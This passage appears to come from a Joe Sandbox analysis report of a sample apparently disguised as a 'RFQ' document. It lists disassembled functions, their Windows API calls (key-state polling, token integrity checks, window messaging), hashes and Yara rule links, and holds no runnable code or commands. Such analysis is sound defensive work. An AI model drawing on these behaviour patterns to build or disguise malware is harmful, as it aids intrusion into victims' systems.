                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0014E917
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0014E91F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                              • String ID:
                                              • API String ID: 1389676194-0
                                              • Opcode ID: 35b6e6429664d0b4cb5f74af14aae2cd76e053369fda1788a21fafb29befd887
                                              • Instruction ID: 8d7e5fc4e4fe45ca0a6dd19e1b56b68cb42ee69ddc11a99c5d2e630943bec5ea
                                              • Opcode Fuzzy Hash: 35b6e6429664d0b4cb5f74af14aae2cd76e053369fda1788a21fafb29befd887
                                              • Instruction Fuzzy Hash: 76511935A00245EFCF01EF65C981AAEBBF5FF48314B1480A9E849AB362CB71ED51DB51
                                              Function 000E2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 000E2357
                                              • ScreenToClient.USER32(001A67B0,?), ref: 000E2374
                                              • GetAsyncKeyState.USER32(00000001), ref: 000E2399
                                              • GetAsyncKeyState.USER32(00000002), ref: 000E23A7
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AsyncState$ClientCursorScreen
                                              • String ID:
                                              • API String ID: 4210589936-0
                                              • Opcode ID: 8e5f77def17503effdffcc2c4486677cde00ccf3566bd35bde5ff17d2c67df49
                                              • Instruction ID: beba93c98478b01daaf74bc46f9b55dc5779451a99247512f1aea466c687c2bf
                                              • Opcode Fuzzy Hash: 8e5f77def17503effdffcc2c4486677cde00ccf3566bd35bde5ff17d2c67df49
                                              • Instruction Fuzzy Hash: 05416D31504159FFDB199F69CC44AEEBBB8BB15320F20432AF829A2290C7745E94DF91
                                              Function 00136920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0013695D
                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 001369A9
                                              • TranslateMessage.USER32(?), ref: 001369D2
                                              • DispatchMessageW.USER32(?), ref: 001369DC
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001369EB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                              • String ID:
                                              • API String ID: 2108273632-0
                                              • Opcode ID: 191ac08565aabdbe8128b1c0c16db3dd2d4312e33f0ae2649d5c744e964ccef1
                                              • Instruction ID: f8fba264872ff041191ee9cec5328be1343c760f16069e95b4ba29abd83712bf
                                              • Opcode Fuzzy Hash: 191ac08565aabdbe8128b1c0c16db3dd2d4312e33f0ae2649d5c744e964ccef1
                                              • Instruction Fuzzy Hash: 9B31D471904246BEDB25CF74DC44FB67BBCAB12308F18C16AE421D75A1D77498C9DBA0
                                              Function 00138F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00138F12
                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00138FBC
                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00138FC4
                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00138FD2
                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00138FDA
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
                                              • Opcode ID: ddb6b6c6618934b78549e7d27842567a8220951e0cb34bb1fb9ebd0aee41aa52
                                              • Instruction ID: 89fd29960859a0960aa910012b7ad14358ec0e78d05b0ce6dd398c0d98ffdb56
                                              • Opcode Fuzzy Hash: ddb6b6c6618934b78549e7d27842567a8220951e0cb34bb1fb9ebd0aee41aa52
                                              • Instruction Fuzzy Hash: 0131CC71500219EFDB14CFA8ED4CAAE7BBAFB05325F104229F925EB2D0C7B09954DB90
                                              Function 0016B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0016B44C
                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0016B471
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0016B489
                                              • GetSystemMetrics.USER32(00000004), ref: 0016B4B2
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00151184,00000000), ref: 0016B4D0
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$Long$MetricsSystem
                                              • String ID:
                                              • API String ID: 2294984445-0
                                              • Opcode ID: 746ba579ea177e26ab73cac704c828304f13f7e2b9e98e0950929cd3af7f94d9
                                              • Instruction ID: 2dc21c89613ef19e617eedcd1031852b1cd25871afcb1f239f6c515cf09972fd
                                              • Opcode Fuzzy Hash: 746ba579ea177e26ab73cac704c828304f13f7e2b9e98e0950929cd3af7f94d9
                                              • Instruction Fuzzy Hash: 2821A331518255AFCB149F38DC84A6A37A4FB05721F154738F927D35E2EB3098A1DB80
                                              Function 000E12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000E134D
                                              • SelectObject.GDI32(?,00000000), ref: 000E135C
                                              • BeginPath.GDI32(?), ref: 000E1373
                                              • SelectObject.GDI32(?,00000000), ref: 000E139C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: 57de284d20983c035c909dfcb6372e11a00ec99fb307a99b034f8c92e1e11b9e
                                              • Instruction ID: 4370d6ab91741a9bbbcae29b82afb005e080facf06cc8c9888df2c8bfea65f51
                                              • Opcode Fuzzy Hash: 57de284d20983c035c909dfcb6372e11a00ec99fb307a99b034f8c92e1e11b9e
                                              • Instruction Fuzzy Hash: 6C213E71904344EFDB119F26EC047A97BFDEB01721F18822AF810A69A0D7B999D1DB90
                                              Function 0013C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 98aebc41c77f27fe587557f5cb05d660fcd2373d966eeb4104addc0083348a9e
                                              • Instruction ID: 05ec1a662c5d14a72c0860c3218e85a66cadb7f4ca8f5194200ec8b2ece86bad
                                              • Opcode Fuzzy Hash: 98aebc41c77f27fe587557f5cb05d660fcd2373d966eeb4104addc0083348a9e
                                              • Instruction Fuzzy Hash: 1101DD72A04209BBD214A5209C52F7B775C9F31394F048011FD08B7283EBE5DE11A3E0
                                              Function 00144D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00144D5C
                                              • __beginthreadex.LIBCMT ref: 00144D7A
                                              • MessageBoxW.USER32(?,?,?,?), ref: 00144D8F
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00144DA5
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00144DAC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                              • String ID:
                                              • API String ID: 3824534824-0
                                              • Opcode ID: f58d77a9feec5b9368173336ce4cf54a72e67046df70e3ce8b8770c08b93e973
                                              • Instruction ID: 0400c090c813c05ffd22ba856ffe59c4a63d74bc4a728d6017321b5e1a5ff7d2
                                              • Opcode Fuzzy Hash: f58d77a9feec5b9368173336ce4cf54a72e67046df70e3ce8b8770c08b93e973
                                              • Instruction Fuzzy Hash: 2E1108B6D04248BBC7019FA8EC08BDA7FACEB56320F14426AF914D3661D7B18D8087A0
                                              Function 0013874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00138766
                                              • GetLastError.KERNEL32(?,0013822A,?,?,?), ref: 00138770
                                              • GetProcessHeap.KERNEL32(00000008,?,?,0013822A,?,?,?), ref: 0013877F
                                              • HeapAlloc.KERNEL32(00000000,?,0013822A,?,?,?), ref: 00138786
                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0013879D
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 842720411-0
                                              • Opcode ID: dc8b22e1e65615efee7cb89e9f9d00452fabf181bee7d68f289bb4a8637ec837
                                              • Instruction ID: d79d033969ab8b85d89fff0acef51d8eaa38ed6caedf2edeadb2b8cce6669fd4
                                              • Opcode Fuzzy Hash: dc8b22e1e65615efee7cb89e9f9d00452fabf181bee7d68f289bb4a8637ec837
                                              • Instruction Fuzzy Hash: 51016271201204FFEB104FA5EC48D67BB6DFF86355B20043DF849C2260DB718C51CA60
                                              Function 001454E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00145502
                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00145510
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00145518
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00145522
                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0014555E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                              • String ID:
                                              • API String ID: 2833360925-0
                                              • Opcode ID: 0d12cd06d310883b2f4202e4efd353e32fdf216e6875e4a72e5cfa5f73ed073f
                                              • Instruction ID: 29e560129661879f0e6458e8abc03cb7c57edb9afb9a6d63abaaf6cb439e2b42
                                              • Opcode Fuzzy Hash: 0d12cd06d310883b2f4202e4efd353e32fdf216e6875e4a72e5cfa5f73ed073f
                                              • Instruction Fuzzy Hash: 08013932C00A1DDBCF009BE8EC885EDBB7ABB09701F01005AE805F6551DB709690C7A1
                                              Function 00137652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?,?,0013799D), ref: 0013766F
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?), ref: 0013768A
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?), ref: 00137698
                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?), ref: 001376A8
                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?), ref: 001376B4
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              • Opcode ID: c241b9ad370281d5f045180662a4bbba08bb59f8eced00c5e8a2b8234c1eafba
                                              • Instruction ID: f7a89eaa8d168ccd9caff11bee3a11d65d12036fb3da0a8854373a86dbaf416e
                                              • Opcode Fuzzy Hash: c241b9ad370281d5f045180662a4bbba08bb59f8eced00c5e8a2b8234c1eafba
                                              • Instruction Fuzzy Hash: B401D4F3604604BBEB205F59EC05BAA7BECEB44751F100068FD04D3261E771DD4187A0
                                              Function 001385F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00138608
                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00138612
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00138621
                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00138628
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0013863E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: 16776ce998022cc7fb99c71f3b971536c0cf0adb402fa04fe41fa5dde2ddf8d2
                                              • Instruction ID: ba5243e407e7d481cebb79089da8656e6fd6d199038352f1d23b9910a0d44e7a
                                              • Opcode Fuzzy Hash: 16776ce998022cc7fb99c71f3b971536c0cf0adb402fa04fe41fa5dde2ddf8d2
                                              • Instruction Fuzzy Hash: 4BF04F75201314AFEB100FA9EC8AE6B3BADFF8A754F10042DF945D7150CBA19C82DA60
                                              Function 00138652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00138669
                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00138673
                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00138682
                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00138689
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0013869F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: 423a41db3b6f3aff710ca8b0effa95a55bcc6d3c0b6e94232746885e65aecc61
                                              • Instruction ID: d42c8a76fbc3c158573b65695247ce097240336f30748ad1c712aed7e87471a7
                                              • Opcode Fuzzy Hash: 423a41db3b6f3aff710ca8b0effa95a55bcc6d3c0b6e94232746885e65aecc61
                                              • Instruction Fuzzy Hash: A2F062B5201314AFEB111FA5EC89E777BADFF8A754F100029F945C6150CBB5DD82DA60
                                              Function 0013C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,000003E9), ref: 0013C6BA
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0013C6D1
                                              • MessageBeep.USER32(00000000), ref: 0013C6E9
                                              • KillTimer.USER32(?,0000040A), ref: 0013C705
                                              • EndDialog.USER32(?,00000001), ref: 0013C71F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                              • String ID:
                                              • API String ID: 3741023627-0
                                              • Opcode ID: 22d772410370331ae4bf7d3337e52cac4d870890c3195db49d5dc59a3a9db015
                                              • Instruction ID: e488304f7e50e93a0a4067bad183568c945d032cb83f59de424485621c5f456a
                                              • Opcode Fuzzy Hash: 22d772410370331ae4bf7d3337e52cac4d870890c3195db49d5dc59a3a9db015
                                              • Instruction Fuzzy Hash: 2C016270504704ABEB25AB24ED4EF9677B8FF00746F00066DF546B14E1DBE1A9998F90
                                              Function 000E13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              • EndPath.GDI32(?), ref: 000E13BF
                                              • StrokeAndFillPath.GDI32(?,?,0011BAD8,00000000,?), ref: 000E13DB
                                              • SelectObject.GDI32(?,00000000), ref: 000E13EE
                                              • DeleteObject.GDI32 ref: 000E1401
                                              • StrokePath.GDI32(?), ref: 000E141C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                              • String ID:
                                              • API String ID: 2625713937-0
                                              • Opcode ID: 0032c758a96250e4626027d707f43c542aa19e273899920ffe6674aedc1bf7cd
                                              • Instruction ID: 41626e866517a3a1d4bee5b377992aba8e738cf8faf8ae5505f73fadd7f6e0c2
                                              • Opcode Fuzzy Hash: 0032c758a96250e4626027d707f43c542aa19e273899920ffe6674aedc1bf7cd
                                              • Instruction Fuzzy Hash: 48F0C474005348EFDB215F26EC0C7983FA9AB02726F088228F42A959F1C77989E6DF51
                                              Function 000F2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00100FF6: std::exception::exception.LIBCMT ref: 0010102C
                                                • Part of subcall function 00100FF6: __CxxThrowException@8.LIBCMT ref: 00101041
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 000E7BB1: _memmove.LIBCMT ref: 000E7C0B
                                              • __swprintf.LIBCMT ref: 000F302D
                                              Strings
                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 000F2EC6
                                              Memory Dump Source
